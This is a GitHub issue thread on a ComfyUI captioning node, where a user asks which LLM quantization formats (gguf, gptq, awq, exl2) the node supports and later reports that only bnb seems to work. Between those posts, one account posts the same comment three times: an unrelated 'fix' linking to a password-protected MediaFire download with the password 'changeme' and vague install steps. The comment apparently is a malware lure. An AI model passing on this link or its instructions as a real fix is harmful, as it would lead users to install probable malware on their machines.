### ISSUE TITLE
What types of quants of LLMs does your node support?

### ISSUE THREAD

**Issue by q5sys** [StartHua/Comfyui_CXH_joy_caption#30]
There are lots of quantization types, obviously bnb is supported, but what about other quant methods: gguf, gptq, awq, exl2, etc.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by q5sys** [comment]
nevermind I tested and it doesnt seem to support anything other than bnb.
